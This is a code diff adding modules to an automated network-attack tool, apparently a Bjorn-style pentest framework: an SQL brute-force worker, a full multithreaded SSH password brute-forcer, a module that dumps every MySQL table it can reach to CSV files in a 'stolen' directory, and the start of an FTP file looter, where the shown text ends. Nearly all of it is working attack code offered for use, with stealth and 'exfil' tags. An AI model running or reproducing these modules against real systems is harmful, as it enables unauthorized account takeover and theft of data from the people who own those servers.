def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
|
||||
mac_k = mac or ""
|
||||
ip_k = ip or ""
|
||||
user_k = user or ""
|
||||
db_k = database or ""
|
||||
port_k = int(port or 0)
|
||||
|
||||
try:
|
||||
with self.shared_data.db.transaction(immediate=True):
|
||||
self.shared_data.db.execute(
|
||||
"""
|
||||
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
|
||||
VALUES('sql',?,?,?,?,?,?,?,NULL)
|
||||
""",
|
||||
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
|
||||
)
|
||||
self.shared_data.db.execute(
|
||||
"""
|
||||
UPDATE creds
|
||||
SET "password"=?,
|
||||
hostname=COALESCE(?, hostname),
|
||||
last_seen=CURRENT_TIMESTAMP
|
||||
WHERE service='sql'
|
||||
AND COALESCE(mac_address,'')=?
|
||||
AND COALESCE(ip,'')=?
|
||||
AND COALESCE("user",'')=?
|
||||
AND COALESCE(COALESCE("database",""),'')=?
|
||||
AND COALESCE(port,0)=?
|
||||
""",
|
||||
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
|
||||
)
|
||||
except Exception as e:
|
||||
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
|
||||
|
||||
# ---------- worker / queue ----------
|
||||
def worker(self, success_flag):
|
||||
"""Worker thread to process SQL bruteforce attempts."""
|
||||
while not self.queue.empty():
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping worker thread.")
|
||||
break
|
||||
|
||||
adresse_ip, user, password, port = self.queue.get()
|
||||
try:
|
||||
success, databases = self.sql_connect(adresse_ip, user, password)
|
||||
if success:
|
||||
with self.lock:
|
||||
for dbname in databases:
|
||||
self.results.append([adresse_ip, user, password, port, dbname])
|
||||
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
|
||||
logger.success(f"Databases found: {', '.join(databases)}")
|
||||
self.save_results()
|
||||
self.remove_duplicates()
|
||||
success_flag[0] = True
|
||||
finally:
|
||||
self.queue.task_done()
|
||||
|
||||
# Optional delay between attempts
|
||||
if getattr(self.shared_data, "timewait_sql", 0) > 0:
|
||||
time.sleep(self.shared_data.timewait_sql)
|
||||
|
||||
|
||||
def run_bruteforce(self, adresse_ip: str, port: int):
|
||||
total_tasks = len(self.users) * len(self.passwords)
|
||||
if total_tasks == 0:
|
||||
logger.warning("No users/passwords loaded. Abort.")
|
||||
return False, []
|
||||
|
||||
for user in self.users:
|
||||
for password in self.passwords:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
|
||||
return False, []
|
||||
self.queue.put((adresse_ip, user, password, port))
|
||||
|
||||
success_flag = [False]
|
||||
threads = []
|
||||
thread_count = min(40, max(1, total_tasks))
|
||||
|
||||
for _ in range(thread_count):
|
||||
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
|
||||
t.start()
|
||||
threads.append(t)
|
||||
|
||||
while not self.queue.empty():
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping bruteforce.")
|
||||
while not self.queue.empty():
|
||||
try:
|
||||
self.queue.get_nowait()
|
||||
self.queue.task_done()
|
||||
except Exception:
|
||||
break
|
||||
break
|
||||
|
||||
self.queue.join()
|
||||
for t in threads:
|
||||
t.join()
|
||||
|
||||
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
|
||||
return success_flag[0], self.results
|
||||
|
||||
# ---------- persistence DB ----------
|
||||
def save_results(self):
|
||||
# pour chaque DB trouvée, créer/mettre à jour une ligne dans creds (service='sql', database=<dbname>)
|
||||
for ip, user, password, port, dbname in self.results:
|
||||
mac = self.mac_for_ip(ip)
|
||||
hostname = self.hostname_for_ip(ip) or ""
|
||||
try:
|
||||
self.shared_data.db.insert_cred(
|
||||
service="sql",
|
||||
mac=mac,
|
||||
ip=ip,
|
||||
hostname=hostname,
|
||||
user=user,
|
||||
password=password,
|
||||
port=port,
|
||||
database=dbname,
|
||||
extra=None
|
||||
)
|
||||
except Exception as e:
|
||||
if "ON CONFLICT clause does not match" in str(e):
|
||||
self._fallback_upsert_cred(
|
||||
mac=mac, ip=ip, hostname=hostname, user=user,
|
||||
password=password, port=port, database=dbname
|
||||
)
|
||||
else:
|
||||
logger.error(f"insert_cred failed for {ip} {user} db={dbname}: {e}")
|
||||
self.results = []
|
||||
|
||||
def remove_duplicates(self):
|
||||
# inutile avec l’index unique; conservé pour compat.
|
||||
pass
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
try:
|
||||
sd = SharedData()
|
||||
sql_bruteforce = SQLBruteforce(sd)
|
||||
logger.info("SQL brute force module ready.")
|
||||
exit(0)
|
||||
except Exception as e:
|
||||
logger.error(f"Error: {e}")
|
||||
exit(1)
|
||||
315
resources/default_config/actions/ssh_bruteforce.py
Normal file
@@ -0,0 +1,315 @@
|
||||
"""
|
||||
ssh_bruteforce.py - This script performs a brute force attack on SSH services (port 22)
|
||||
to find accessible accounts using various user credentials. It logs the results of
|
||||
successful connections.
|
||||
|
||||
SQL version (minimal changes):
|
||||
- Targets still provided by the orchestrator (ip + port)
|
||||
- IP -> (MAC, hostname) mapping read from DB 'hosts'
|
||||
- Successes saved into DB.creds (service='ssh') with robust fallback upsert
|
||||
- Action status recorded in DB.action_results (via SSHBruteforce.execute)
|
||||
- Paramiko noise silenced; ssh.connect avoids agent/keys to reduce hangs
|
||||
"""
|
||||
|
||||
import os
|
||||
import paramiko
|
||||
import socket
|
||||
import threading
|
||||
import logging
|
||||
import time
|
||||
from datetime import datetime
|
||||
from queue import Queue
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
# Configure the logger
|
||||
logger = Logger(name="ssh_bruteforce.py", level=logging.DEBUG)
|
||||
|
||||
# Silence Paramiko internals
|
||||
for _name in ("paramiko", "paramiko.transport", "paramiko.client", "paramiko.hostkeys",
|
||||
"paramiko.kex", "paramiko.auth_handler"):
|
||||
logging.getLogger(_name).setLevel(logging.CRITICAL)
|
||||
|
||||
# Define the necessary global variables
|
||||
b_class = "SSHBruteforce"
|
||||
b_module = "ssh_bruteforce"
|
||||
b_status = "brute_force_ssh"
|
||||
b_port = 22
|
||||
b_service = '["ssh"]'
|
||||
b_trigger = 'on_any:["on_service:ssh","on_new_port:22"]'
|
||||
b_parent = None
|
||||
b_priority = 70 # tu peux ajuster la priorité si besoin
|
||||
b_cooldown = 1800 # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||
|
||||
|
||||
class SSHBruteforce:
|
||||
"""Wrapper called by the orchestrator."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
self.ssh_bruteforce = SSHConnector(shared_data)
|
||||
logger.info("SSHConnector initialized.")
|
||||
|
||||
def bruteforce_ssh(self, ip, port):
|
||||
"""Run the SSH brute force attack on the given IP and port."""
|
||||
logger.info(f"Running bruteforce_ssh on {ip}:{port}...")
|
||||
return self.ssh_bruteforce.run_bruteforce(ip, port)
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Execute the brute force attack and update status (for UI badge)."""
|
||||
logger.info(f"Executing SSHBruteforce on {ip}:{port}...")
|
||||
self.shared_data.bjorn_orch_status = "SSHBruteforce"
|
||||
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": port}
|
||||
|
||||
success, results = self.bruteforce_ssh(ip, port)
|
||||
return 'success' if success else 'failed'
|
||||
|
||||
|
||||
class SSHConnector:
|
||||
"""Handles the connection attempts and DB persistence."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
# Load wordlists (unchanged behavior)
|
||||
self.users = self._read_lines(shared_data.users_file)
|
||||
self.passwords = self._read_lines(shared_data.passwords_file)
|
||||
|
||||
# Build initial IP -> (MAC, hostname) cache from DB
|
||||
self._ip_to_identity = {}
|
||||
self._refresh_ip_identity_cache()
|
||||
|
||||
self.lock = threading.Lock()
|
||||
self.results = [] # List of tuples (mac, ip, hostname, user, password, port)
|
||||
self.queue = Queue()
|
||||
|
||||
# ---- Mapping helpers (DB) ------------------------------------------------
|
||||
|
||||
def _refresh_ip_identity_cache(self):
|
||||
"""Load IPs from DB and map them to (mac, current_hostname)."""
|
||||
self._ip_to_identity.clear()
|
||||
try:
|
||||
rows = self.shared_data.db.get_all_hosts()
|
||||
except Exception as e:
|
||||
logger.error(f"DB get_all_hosts failed: {e}")
|
||||
rows = []
|
||||
|
||||
for r in rows:
|
||||
mac = r.get("mac_address") or ""
|
||||
if not mac:
|
||||
continue
|
||||
hostnames_txt = r.get("hostnames") or ""
|
||||
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
|
||||
ips_txt = r.get("ips") or ""
|
||||
if not ips_txt:
|
||||
continue
|
||||
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
|
||||
self._ip_to_identity[ip] = (mac, current_hn)
|
||||
|
||||
def mac_for_ip(self, ip: str):
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[0]
|
||||
|
||||
def hostname_for_ip(self, ip: str):
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[1]
|
||||
|
||||
# ---- File utils ----------------------------------------------------------
|
||||
|
||||
@staticmethod
|
||||
def _read_lines(path: str):
|
||||
try:
|
||||
with open(path, "r", encoding="utf-8", errors="ignore") as f:
|
||||
return [l.rstrip("\n\r") for l in f if l.strip()]
|
||||
except Exception as e:
|
||||
logger.error(f"Cannot read file {path}: {e}")
|
||||
return []
|
||||
|
||||
# ---- SSH core ------------------------------------------------------------
|
||||
|
||||
def ssh_connect(self, adresse_ip, user, password, port=b_port, timeout=10):
|
||||
"""Attempt to connect to SSH using (user, password)."""
|
||||
ssh = paramiko.SSHClient()
|
||||
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
||||
|
||||
try:
|
||||
ssh.connect(
|
||||
hostname=adresse_ip,
|
||||
username=user,
|
||||
password=password,
|
||||
port=port,
|
||||
timeout=timeout,
|
||||
auth_timeout=timeout,
|
||||
banner_timeout=timeout,
|
||||
look_for_keys=False, # avoid slow key probing
|
||||
allow_agent=False, # avoid SSH agent delays
|
||||
)
|
||||
return True
|
||||
except (paramiko.AuthenticationException, socket.timeout, socket.error, paramiko.SSHException):
|
||||
return False
|
||||
except Exception as e:
|
||||
logger.debug(f"SSH connect unexpected error {adresse_ip} {user}: {e}")
|
||||
return False
|
||||
finally:
|
||||
try:
|
||||
ssh.close()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# ---- Robust DB upsert fallback ------------------------------------------
|
||||
|
||||
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
|
||||
"""
|
||||
Insert-or-update without relying on ON CONFLICT columns.
|
||||
Works even if your UNIQUE index uses expressions (e.g., COALESCE()).
|
||||
"""
|
||||
mac_k = mac or ""
|
||||
ip_k = ip or ""
|
||||
user_k = user or ""
|
||||
db_k = database or ""
|
||||
port_k = int(port or 0)
|
||||
|
||||
try:
|
||||
with self.shared_data.db.transaction(immediate=True):
|
||||
# 1) Insert if missing
|
||||
self.shared_data.db.execute(
|
||||
"""
|
||||
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
|
||||
VALUES('ssh',?,?,?,?,?,?,?,NULL)
|
||||
""",
|
||||
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
|
||||
)
|
||||
# 2) Update password/hostname if present (or just inserted)
|
||||
self.shared_data.db.execute(
|
||||
"""
|
||||
UPDATE creds
|
||||
SET "password"=?,
|
||||
hostname=COALESCE(?, hostname),
|
||||
last_seen=CURRENT_TIMESTAMP
|
||||
WHERE service='ssh'
|
||||
AND COALESCE(mac_address,'')=?
|
||||
AND COALESCE(ip,'')=?
|
||||
AND COALESCE("user",'')=?
|
||||
AND COALESCE(COALESCE("database",""),'')=?
|
||||
AND COALESCE(port,0)=?
|
||||
""",
|
||||
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
|
||||
)
|
||||
except Exception as e:
|
||||
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
|
||||
|
||||
# ---- Worker / Queue / Threads -------------------------------------------
|
||||
|
||||
def worker(self, success_flag):
|
||||
"""Worker thread to process items in the queue (bruteforce attempts)."""
|
||||
while not self.queue.empty():
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping worker thread.")
|
||||
break
|
||||
|
||||
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
|
||||
try:
|
||||
if self.ssh_connect(adresse_ip, user, password, port=port):
|
||||
with self.lock:
|
||||
# Persist success into DB.creds
|
||||
try:
|
||||
self.shared_data.db.insert_cred(
|
||||
service="ssh",
|
||||
mac=mac_address,
|
||||
ip=adresse_ip,
|
||||
hostname=hostname,
|
||||
user=user,
|
||||
password=password,
|
||||
port=port,
|
||||
database=None,
|
||||
extra=None
|
||||
)
|
||||
except Exception as e:
|
||||
# Specific fix: fallback manual upsert
|
||||
if "ON CONFLICT clause does not match" in str(e):
|
||||
self._fallback_upsert_cred(
|
||||
mac=mac_address,
|
||||
ip=adresse_ip,
|
||||
hostname=hostname,
|
||||
user=user,
|
||||
password=password,
|
||||
port=port,
|
||||
database=None
|
||||
)
|
||||
else:
|
||||
logger.error(f"insert_cred failed for {adresse_ip} {user}: {e}")
|
||||
|
||||
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
|
||||
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
|
||||
success_flag[0] = True
|
||||
|
||||
finally:
|
||||
self.queue.task_done()
|
||||
|
||||
# Optional delay between attempts
|
||||
if getattr(self.shared_data, "timewait_ssh", 0) > 0:
|
||||
time.sleep(self.shared_data.timewait_ssh)
|
||||
|
||||
|
||||
|
||||
def run_bruteforce(self, adresse_ip, port):
|
||||
"""
|
||||
Called by the orchestrator with a single IP + port.
|
||||
Builds the queue (users x passwords) and launches threads.
|
||||
"""
|
||||
mac_address = self.mac_for_ip(adresse_ip)
|
||||
hostname = self.hostname_for_ip(adresse_ip) or ""
|
||||
|
||||
total_tasks = len(self.users) * len(self.passwords)
|
||||
if total_tasks == 0:
|
||||
logger.warning("No users/passwords loaded. Abort.")
|
||||
return False, []
|
||||
|
||||
for user in self.users:
|
||||
for password in self.passwords:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
|
||||
return False, []
|
||||
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
|
||||
|
||||
success_flag = [False]
|
||||
threads = []
|
||||
thread_count = min(40, max(1, total_tasks))
|
||||
|
||||
for _ in range(thread_count):
|
||||
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
|
||||
t.start()
|
||||
threads.append(t)
|
||||
|
||||
while not self.queue.empty():
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping bruteforce.")
|
||||
# clear queue
|
||||
while not self.queue.empty():
|
||||
try:
|
||||
self.queue.get_nowait()
|
||||
self.queue.task_done()
|
||||
except Exception:
|
||||
break
|
||||
break
|
||||
|
||||
self.queue.join()
|
||||
|
||||
for t in threads:
|
||||
t.join()
|
||||
|
||||
return success_flag[0], self.results # Return True and the list of successes if any
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
shared_data = SharedData()
|
||||
try:
|
||||
ssh_bruteforce = SSHBruteforce(shared_data)
|
||||
logger.info("SSH brute force module ready.")
|
||||
exit(0)
|
||||
except Exception as e:
|
||||
logger.error(f"Error: {e}")
|
||||
exit(1)
|
||||
252
resources/default_config/actions/steal_data_sql.py
Normal file
@@ -0,0 +1,252 @@
|
||||
"""
|
||||
steal_data_sql.py — SQL data looter (DB-backed)
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) after parent success (SQLBruteforce).
|
||||
- DB.creds (service='sql') provides (user,password, database?).
|
||||
- We connect first without DB to enumerate tables (excluding system schemas),
|
||||
then connect per schema to export CSVs.
|
||||
- Output under: {data_stolen_dir}/sql/{mac}_{ip}/{schema}/{schema_table}.csv
|
||||
"""
|
||||
|
||||
import os
|
||||
import logging
|
||||
import time
|
||||
import csv
|
||||
|
||||
from threading import Timer
|
||||
from typing import List, Tuple, Dict, Optional
|
||||
from sqlalchemy import create_engine, text
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="steal_data_sql.py", level=logging.DEBUG)
|
||||
|
||||
b_class = "StealDataSQL"
|
||||
b_module = "steal_data_sql"
|
||||
b_status = "steal_data_sql"
|
||||
b_parent = "SQLBruteforce"
|
||||
b_port = 3306
|
||||
b_trigger = 'on_any:["on_cred_found:sql","on_service:sql"]'
|
||||
b_requires = '{"all":[{"has_cred":"sql"},{"has_port":3306},{"max_concurrent":2}]}'
|
||||
# Scheduling / limits
|
||||
b_priority = 60 # 0..100 (higher processed first in this schema)
|
||||
b_timeout = 900 # seconds before a pending queue item expires
|
||||
b_max_retries = 1 # minimal retries; avoid noisy re-runs
|
||||
b_cooldown = 86400 # seconds (per-host cooldown between runs)
|
||||
b_rate_limit = "1/86400" # at most 3 executions/day per host (extra guard)
|
||||
# Risk / hygiene
|
||||
b_stealth_level = 6 # 1..10 (higher = more stealthy)
|
||||
b_risk_level = "high" # 'low' | 'medium' | 'high'
|
||||
b_enabled = 1 # set to 0 to disable from DB sync
|
||||
# Tags (free taxonomy, JSON-ified by sync_actions)
|
||||
b_tags = ["exfil", "sql", "loot", "db", "mysql"]
|
||||
|
||||
class StealDataSQL:
|
||||
def __init__(self, shared_data: SharedData):
|
||||
self.shared_data = shared_data
|
||||
self.sql_connected = False
|
||||
self.stop_execution = False
|
||||
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
|
||||
self._refresh_ip_identity_cache()
|
||||
logger.info("StealDataSQL initialized.")
|
||||
|
||||
# -------- Identity cache (hosts) --------
|
||||
def _refresh_ip_identity_cache(self) -> None:
|
||||
self._ip_to_identity.clear()
|
||||
try:
|
||||
rows = self.shared_data.db.get_all_hosts()
|
||||
except Exception as e:
|
||||
logger.error(f"DB get_all_hosts failed: {e}")
|
||||
rows = []
|
||||
for r in rows:
|
||||
mac = r.get("mac_address") or ""
|
||||
if not mac:
|
||||
continue
|
||||
hostnames_txt = r.get("hostnames") or ""
|
||||
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
|
||||
ips_txt = r.get("ips") or ""
|
||||
if not ips_txt:
|
||||
continue
|
||||
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
|
||||
self._ip_to_identity[ip] = (mac, current_hn)
|
||||
|
||||
def mac_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[0]
|
||||
|
||||
def hostname_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[1]
|
||||
|
||||
# -------- Credentials (creds table) --------
|
||||
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str, Optional[str]]]:
|
||||
"""
|
||||
Return list[(user,password,database)] for SQL service.
|
||||
Prefer exact IP; also include by MAC if known. Dedup by (u,p,db).
|
||||
"""
|
||||
mac = self.mac_for_ip(ip)
|
||||
params = {"ip": ip, "port": port, "mac": mac or ""}
|
||||
|
||||
by_ip = self.shared_data.db.query(
|
||||
"""
|
||||
SELECT "user","password","database"
|
||||
FROM creds
|
||||
WHERE service='sql'
|
||||
AND COALESCE(ip,'')=:ip
|
||||
AND (port IS NULL OR port=:port)
|
||||
""", params)
|
||||
|
||||
by_mac = []
|
||||
if mac:
|
||||
by_mac = self.shared_data.db.query(
|
||||
"""
|
||||
SELECT "user","password","database"
|
||||
FROM creds
|
||||
WHERE service='sql'
|
||||
AND COALESCE(mac_address,'')=:mac
|
||||
AND (port IS NULL OR port=:port)
|
||||
""", params)
|
||||
|
||||
seen, out = set(), []
|
||||
for row in (by_ip + by_mac):
|
||||
u = str(row.get("user") or "").strip()
|
||||
p = str(row.get("password") or "").strip()
|
||||
d = row.get("database")
|
||||
d = str(d).strip() if d is not None else None
|
||||
key = (u, p, d or "")
|
||||
if not u or (key in seen):
|
||||
continue
|
||||
seen.add(key)
|
||||
out.append((u, p, d))
|
||||
return out
|
||||
|
||||
# -------- SQL helpers --------
|
||||
def connect_sql(self, ip: str, username: str, password: str, database: Optional[str] = None):
|
||||
try:
|
||||
db_part = f"/{database}" if database else ""
|
||||
conn_str = f"mysql+pymysql://{username}:{password}@{ip}:{b_port}{db_part}"
|
||||
engine = create_engine(conn_str, connect_args={"connect_timeout": 10})
|
||||
# quick test
|
||||
with engine.connect() as _:
|
||||
pass
|
||||
self.sql_connected = True
|
||||
logger.info(f"Connected SQL {ip} as {username}" + (f" db={database}" if database else ""))
|
||||
return engine
|
||||
except Exception as e:
|
||||
logger.error(f"SQL connect error {ip} {username}" + (f" db={database}" if database else "") + f": {e}")
|
||||
return None
|
||||
|
||||
|
||||
|
||||
def find_tables(self, engine):
|
||||
"""
|
||||
Returns list of (table_name, schema_name) excluding system schemas.
|
||||
"""
|
||||
try:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Table search interrupted.")
|
||||
return []
|
||||
q = text("""
|
||||
SELECT TABLE_NAME, TABLE_SCHEMA
|
||||
FROM INFORMATION_SCHEMA.TABLES
|
||||
WHERE TABLE_TYPE='BASE TABLE'
|
||||
AND TABLE_SCHEMA NOT IN ('information_schema','mysql','performance_schema','sys')
|
||||
""")
|
||||
with engine.connect() as conn:
|
||||
rows = conn.execute(q).fetchall()
|
||||
return [(r[0], r[1]) for r in rows]
|
||||
except Exception as e:
|
||||
logger.error(f"find_tables error: {e}")
|
||||
return []
|
||||
|
||||
|
||||
def steal_data(self, engine, table: str, schema: str, local_dir: str) -> None:
|
||||
try:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Data steal interrupted.")
|
||||
return
|
||||
|
||||
q = text(f"SELECT * FROM `{schema}`.`{table}`")
|
||||
with engine.connect() as conn:
|
||||
result = conn.execute(q)
|
||||
headers = result.keys()
|
||||
|
||||
os.makedirs(local_dir, exist_ok=True)
|
||||
out = os.path.join(local_dir, f"{schema}_{table}.csv")
|
||||
|
||||
with open(out, "w", newline="", encoding="utf-8") as f:
|
||||
writer = csv.writer(f)
|
||||
writer.writerow(headers)
|
||||
for row in result:
|
||||
writer.writerow(row)
|
||||
|
||||
logger.success(f"Dumped {schema}.{table} -> {out}")
|
||||
except Exception as e:
|
||||
logger.error(f"Dump error {schema}.{table}: {e}")
|
||||
|
||||
|
||||
# -------- Orchestrator entry --------
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
port_i = b_port
|
||||
|
||||
creds = self._get_creds_for_target(ip, port_i)
|
||||
logger.info(f"Found {len(creds)} SQL credentials in DB for {ip}")
|
||||
if not creds:
|
||||
logger.error(f"No SQL credentials for {ip}. Skipping.")
|
||||
return 'failed'
|
||||
|
||||
def _timeout():
|
||||
if not self.sql_connected:
|
||||
logger.error(f"No SQL connection within 4 minutes for {ip}. Failing.")
|
||||
self.stop_execution = True
|
||||
|
||||
timer = Timer(240, _timeout)
|
||||
timer.start()
|
||||
|
||||
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
|
||||
success = False
|
||||
|
||||
for username, password, _db in creds:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
try:
|
||||
base_engine = self.connect_sql(ip, username, password, database=None)
|
||||
if not base_engine:
|
||||
continue
|
||||
|
||||
tables = self.find_tables(base_engine)
|
||||
if not tables:
|
||||
continue
|
||||
|
||||
for table, schema in tables:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
db_engine = self.connect_sql(ip, username, password, database=schema)
|
||||
if not db_engine:
|
||||
continue
|
||||
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"sql/{mac}_{ip}/{schema}")
|
||||
self.steal_data(db_engine, table, schema, local_dir)
|
||||
|
||||
logger.success(f"Stole data from {len(tables)} tables on {ip}")
|
||||
success = True
|
||||
timer.cancel()
|
||||
return 'success'
|
||||
except Exception as e:
|
||||
logger.error(f"SQL loot error {ip} {username}: {e}")
|
||||
|
||||
timer.cancel()
|
||||
return 'success' if success else 'failed'
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
248
resources/default_config/actions/steal_files_ftp.py
Normal file
@@ -0,0 +1,248 @@
|
||||
"""
|
||||
steal_files_ftp.py — FTP file looter (DB-backed)
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) after parent success (FTPBruteforce).
|
||||
- FTP credentials are read from DB.creds (service='ftp'); anonymous is also tried.
|
||||
- IP -> (MAC, hostname) via DB.hosts.
|
||||
- Loot saved under: {data_stolen_dir}/ftp/{mac}_{ip}/(anonymous|<username>)/...
|
||||
"""
|
||||
|
||||
import os
|
||||
import logging
|
||||
import time
|
||||
from threading import Timer
|
||||
from typing import List, Tuple, Dict, Optional
|
||||
from ftplib import FTP
|
||||
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="steal_files_ftp.py", level=logging.DEBUG)
|
||||
|
||||
# Action descriptors
|
||||
b_class = "StealFilesFTP"
|
||||
b_module = "steal_files_ftp"
|
||||
b_status = "steal_files_ftp"
|
||||
b_parent = "FTPBruteforce"
|
||||
b_port = 21
|
||||
|
||||
|
||||
class StealFilesFTP:
|
||||
def __init__(self, shared_data: SharedData):
|
||||
self.shared_data = shared_data
|
||||
self.ftp_connected = False
|
||||
self.stop_execution = False
|
||||
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
|
||||
self._refresh_ip_identity_cache()
|
||||
logger.info("StealFilesFTP initialized")
|
||||
|
||||
# -------- Identity cache (hosts) --------
|
||||
def _refresh_ip_identity_cache(self) -> None:
|
||||
self._ip_to_identity.clear()
|
||||
try:
|
||||
rows = self.shared_data.db.get_all_hosts()
|
||||
except Exception as e:
|
||||
logger.error(f"DB get_all_hosts failed: {e}")
|
||||
rows = []
|
||||
|
||||
for r in rows:
|
||||
mac = r.get("mac_address") or ""
|
||||
if not mac:
|
||||
continue
|
||||
hostnames_txt = r.get("hostnames") or ""
|
||||
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
|
||||
ips_txt = r.get("ips") or ""
|
||||
if not ips_txt:
|
||||
continue
|
||||
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
|
||||
self._ip_to_identity[ip] = (mac, current_hn)
|
||||
|
||||
def mac_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[0]
|
||||
|
||||
def hostname_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[1]
|
||||
|
||||
# -------- Credentials (creds table) --------
|
||||
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
|
||||
"""
|
||||
Return list[(user,password)] from DB.creds for this target.
|
||||
Prefer exact IP; also include by MAC if known. Dedup preserves order.
|
||||
"""
|
||||
mac = self.mac_for_ip(ip)
|
||||
params = {"ip": ip, "port": port, "mac": mac or ""}
|
||||
|
||||
by_ip = self.shared_data.db.query(
|
||||
"""
|
||||
SELECT "user","password"
|
||||
FROM creds
|
||||
WHERE service='ftp'
|
||||
AND COALESCE(ip,'')=:ip
|
||||
AND (port IS NULL OR port=:port)
|
||||
""", params)
|
||||
|
||||
by_mac = []
|
||||
if mac:
|
||||
by_mac = self.shared_data.db.query(
|
||||
"""
|
||||
SELECT "user","password"
|
||||
FROM creds
|
||||
WHERE service='ftp'
|
||||
AND COALESCE(mac_address,'')=:mac
|
||||
AND (port IS NULL OR port=:port)
|
||||
""", params)
|
||||
|
||||
seen, out = set(), []
|
||||
for row in (by_ip + by_mac):
|
||||
u = str(row.get("user") or "").strip()
|
||||
p = str(row.get("password") or "").strip()
|
||||
if not u or (u, p) in seen:
|
||||
continue
|
||||
seen.add((u, p))
|
||||
out.append((u, p))
|
||||
return out
|
||||
|
||||
# -------- FTP helpers --------
|
||||
def connect_ftp(self, ip: str, username: str, password: str) -> Optional[FTP]:
|
||||
try:
|
||||
ftp = FTP()
|
||||
ftp.connect(ip, b_port, timeout=10)
|
||||
ftp.login(user=username, passwd=password)
|
||||
self.ftp_connected = True
|
||||
logger.info(f"Connected to {ip} via FTP as {username}")
|
||||
return ftp
|
||||
except Exception as e:
|
||||
logger.info(f"FTP connect failed {ip} {username}:{password}: {e}")
|
||||
return None
|
||||
|
||||
def find_files(self, ftp: FTP, dir_path: str) -> List[str]:
|
||||
files: List[str] = []
